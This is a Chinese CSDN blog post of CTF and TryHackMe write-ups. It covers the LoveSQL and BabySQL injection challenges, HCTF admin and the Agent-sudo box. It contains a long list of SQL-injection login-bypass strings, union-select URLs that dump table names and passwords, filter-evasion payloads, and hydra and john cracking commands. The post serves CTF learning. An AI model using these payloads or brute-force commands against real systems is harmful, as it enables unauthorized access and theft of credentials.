Web 题记

已于 2024-04-16 17:09:58 修改
阅读量379 收藏 9
点赞数 3
文章标签: 前端 数据库 java
于 2024-04-14 20:54:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73867210/article/details/137500232
版权

[极客大挑战 2019]LoveSQL

看到这种就肯定先想到万能密码,试试,得到了用户名和密码

 总结了一些万能密码:

' or 1='1
'or'='or'
admin
admin'--
admin' or 4=4--
admin' or '1'='1'--
admin888
"or "a"="a
admin' or 2=2#
a' having 1=1#
a' having 1=1--
admin' or '2'='2
')or('a'='a
or 4=4--
c
a'or' 4=4--
"or 4=4--
'or'a'='a
"or"="a'='a
'or''='
'or'='or'
1 or '1'='1'=1
1 or '1'='1' or 4=4
'OR 4=4%00
"or 4=4%00
'xor
admin' UNION Select 1,1,1 FROM admin Where ''='
1
-1%cf' union select 1,1,1 as password,1,1,1 %23
1
17..admin' or 'a'='a 密码随便
'or'='or'
'or 4=4/*
something
' OR '1'='1
1'or'1'='1
admin' OR 4=4/*
1'or'1'='1

接着就是常规的爆字段,爆表,爆爆爆!!!

/check.php?username=admin' order by 3%23&password=1
注意:此时是在url中输入的,所以不能用#,而用其url编码%23

 到4的时候报错了,那就是3个字段

/check.php?username=1' union select 1,2,3%23&password=1


/check.php?username=1' union select 1,database(),version()%23&password=1

数据库为geek,爆表

/check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek'%23&password=1

 试一下l0ve1ysq1这个表

/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='geek' and table_name='l0ve1ysq1'%23&password=1

爆数据

/check.php?username=1' union select 1,2,group_concat(password) from l0ve1ysq1%23&password=1

 [极客大挑战 2019]BabySQL

和上一个题目的界面一样,先试试万能密码, 发现不行,

 观察返回的发现or不见了,通过测试发现过滤了好多,双写绕过,通过union联合查询

?username=admin&password=admin' uunionnion sselectelect 1,2,3%23

?username=admin&password=admin' uunionnion sselectelect 1,2,group_concat(table_name)ffromrom infoorrmation_schema.tables wwherehere table_schema=database()%23

?username=admin&password=admin' uunionnion sselectelect 1,2,group_concat(column_name)ffromrom infoorrmation_schema.columns wwherehere table_name='b4bsql'%23

?username=admin&password=admin' uunionnion sselectelect 1,2,group_concat(passwoorrd)ffromrom b4bsql%23

 [HCTF 2018]admin

两个功能,一个登陆一个注册 ,题目名字是admin,估计用户名就是admin,弱口令爆破一下

看到其他师傅还有很多解法,也学习一下:一题三解之2018HCTF&admin-安全客 - 安全资讯平台

【Tryhackme】Agent-sudo

nmap扫描开放的端口

 发现有三个开放的端口,先访问80端口

 访问网站需要修改User-Agent 为C才能触发到指定页面

bp抓包修改User-Agent

 根据这段文字可以看到一个用户名:chris,还有弱密码,那我们就来爆一下

hydra -l chris -P /usr/share/wordlists/rockyou.txt 10.10.24.83 -t 16 ftp

 登录ftp

 下载所有文件

 根据提示这俩张图片都不是真的图片,用binwalk看一下

可以看到里面隐藏了一个zip文件,需要密码

 使用john破解zip文件

zip2john 8702.zip > zip.hash        //获取hash
john zip.hash                    //破解hash

 破解出密码为alien

 用7z 解压缩

7z e 8702.zip

 解码这段字符串

 

用隐写工具steghide 验证jpg里是否有内容,Area51作为密钥

 得到用户名 : james 密码 : hackerrules!

ssh登录目标靶机

 得到userflag

 sudo -l 查看本账号超级权限,发现不可以用bash

CVE-2019-14287:

 因为box时间到了,后面就很简单,大概就参考这个

orange-snow
关注
  • 3
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
数据结构题记(C语言版)
05-25
数据结构题记(C语言版)
数据结构题记
10-06
数据结构题集 严蔚敏.pdf数据结构习题集严蔚敏.pdf
Web题记
m0_73867210的博客
03-04 888
漏洞成因就是服务端接收了用户的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,执行了用户插入的可以破坏模板的语句,因而可能导致了敏感信息泄露、代码执行、GetShell 等问题。Smarty支持使用{php}{/php}标签来执行被包裹其中的php指令,那么我们可以使用{php}{/php}标签来构造payload,但是本题会报错。,然后放到渲染函数里,然后生成模板+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前。访问/console。
ctfshow web题记
m0_73867210的博客
03-01 928
看了这个有点懂了,因为将'过滤了所以我们需要用\'来代替',而要让这个语句永远为真则可以构造||1,后面的#也是为了注释掉最后面的\',将前面的语句闭合起来,这样就形成了'xxxx'||1,永为真。这个比较用的是强比较,会先判断两种字符串的类型是否相等,再比较值是否相等,后面的函数可参考上一题的用法,只不过这一题里面的base为0,可以用八进制或者十六进制绕过。sql语句这里也没学的咋好就看别人的解题步骤了,先用单引号闭合,发现没啥变化,然后用\,发现出现在了返回的语句中。常用于强制类型转换。
攻防世界web新手区题记-下
outman23的博客
03-14 91
weak-auth 进入场景,随便试了一个,出现如下提示 说明用户名为“admin",密码用了下字典,测试通过,通过burp抓包也可以, 然后得到flag simple-php 此题考查php语言的理解 大概意思为 a参数的要求 a必须等于0且a为真 b参数的要求 b不能为数字且b大于1234 在url后面加入指令就得到FLAG ...
Web.xml详解
Away_summer的博客
10-23 239
转载自:http://blog.csdn.net/believejava/article/details/43229361 这篇文章主要是综合网上关于web.xml的一些介绍,看完自己对这个配置文件有了很直观的理解,以后会经常拿来阅读,怕找不到原文就转载过来了。希望对大家有所帮助,也欢迎大家一起讨论。 —题记 Web.xml详解: 1.web.xml加载过程(步骤) 首先简单讲一下,web.xml...
攻防世界web新手区题记
outman23的博客
02-28 221
view source 先进入题目 得到一个空白网站 然后不能右键查看源码,再f12 得到flag cyberpeace{7485d039a7d75614ebd5b7469d2f539b} robots 这里百度了一下robots协议, robots.txt文件是一个文本文件,使用任何一个常见的文本编辑器,比如Windows系统自带的Notepad,就可以创建和编辑它 [1] 。robots.txt是一个协议,而不是一个命令。robots.txt是搜索引擎中访问网站的时候要查看的第一个文件。robo
web前端学习书单
wuxy720
12-25 434
web前端学习书单
CTF题记—ctfshow&&BUU
m0re's blog
10-03 2649
web19 题目描述:密钥什么的,就不要放在前端了 打开题目是登录框,第一想法是去尝试了万能密码。但是没有成功。然后才回过头看题目描述是前端有密钥。所以就看源代码。 上面是加密方法,百度发现是前端AES加密。它会将用户输入的密码字符串进行加密。两种可行方法,第一种是解密,先百度,然后这样这样,再那样那样就解出来了。(没有使用这种)。第二种是抓包修改,绕过前端验证。将密钥修改为$p的字符串。发包得到flag web 7、8 题目描述:版本控制很重要,但不要部署到生产环境更重要。 版本信息部署到生产环境,两
CTF题记——详谈两道Web
m0re's blog
11-02 1142
前言 最近学校也在招新,基本没什么时间做题,最近也很少发博客。就写几道题来充充数吧。 正文 fakebook 我的思路呢,只有一点沾边了,记一下现在的思考: 注册了一个username就找不到其他信息了,然后考虑了源码泄露。找了robots.txt,发现了一个user.php.bak,访问得到泄露的文件。是这样 <?php class UserInfo { public $name = ""; public $age = 0; public $blog = ""; p
Web.xml配置详解
Bruce_Up的博客
10-26 563
版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/believejava/article/details/43229361 这篇文章主要是综合网上关于web.xml的一些介绍,希望对大家有所帮助,也欢迎大家一起讨论。 ---题记 Web.xml详解...
我的搜索题记整理
10-30
根据给定的信息,我们可以从这段代码中提取出两个主要的IT知识点:广度优先搜索(Breadth-First Search, BFS)与深度优先搜索(Depth-First Search, DFS)。接下来,我们将详细介绍这两个算法及其在代码中的应用。...
题记优秀作文范例.doc
09-28
1. 题记的运用:文章开头的"题记"是一种文学手法,用来引出主题或设定情感基调。在这个例子中,每个作者都用题记表达了对特定人物的赞美和深情。 2. 描述场景:作者通过描绘环境细节,如春日、海棠前的老塔钟、教室...
Java 公司面试的面试题记
04-22
Java公司面试通常会涵盖多个方面的知识点,包括但不限于基础语法、面向对象编程、集合框架、多线程、异常处理、内存管理、JVM调优、设计模式、数据库操作、网络编程、Spring框架及其生态等。以下是对这些核心领域的...
前端Web-JavaScript(上)
Yu2uki的博客
07-31 1383
JavaScript(简称:JS) 是一门跨平台、面向对象的脚本语言,是用来控制网页行为的,实现人机交互效果。JavaScript 和 Java 是完全不同的语言,不论是概念还是设计。但是基础语法类似。组成:ECMAScript: 规定了JS基础语法核心知识,包括变量、数据类型、流程控制、函数、对象等。BOM:浏览器对象模型,用于操作浏览器本身,如:页面弹窗、地址栏操作、关闭窗口等。DOM:文档对象模型,用于操作HTML文档,如:改变标签内的内容、改变标签内字体样式等。
高德地图离线版 使用高德地图api的方法
最新发布
m0_62336925的博客
08-02 298
然因为高德地图的瓦片地图太大,所以要让后端部署下 前端直接调用 如果本地 直接找到瓦片图路径就可以。这个代码把你想用的方法名保存到本地。这个时候会报错 因为没有这个方法。然后就可以正常使用这个方法拉。然后使用他的离线方法。找到对应的名字 复制。
【分享】前端程序员-技术网站推荐
一位前行者的博客
07-30 877
对于前端开发人员来说,以下是一些推荐的技术网站,这些网站提供了丰富的资源和知识,可以帮助你提升前端开发技能:收集一些 、、 的网站 vite 官方中文文档 element-plus 官方中文文档 pinia 官方中文文档 vue-router 官方中文文档 Tailwind CSS 官方文档 vitest 官方中文文档 es6 中文文档 axios 官方中文文档 vxetable 官方中文文档 lodash 中文文档 echarts 官方中文文档 animat
前端面试:项目细节重难点问题分享(十四)
weixin_49062485的博客
08-02 320
更多详情:爱米的前端小笔记(csdn~xitujuejin~zhiHu~Baidu~小红shu)同步更新,等你来看!都是利用下班时间整理的,整理不易,大家多多👍💛➕🤔哦!你们的支持才是我不断更新的动力!
男女,由朋友到恋人到夫妻。写一篇情感题记
09-23
### 回答1: 男女之间的爱情,源自朋友之间的善良,升华为恋人相互的珍重,最终演变成夫妻之间真挚的爱情。无论是从朋友到恋人,还是从恋人到夫妻,它们都有着共同的特点:坚定的信任、坚实的依赖、深沉的爱恋。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值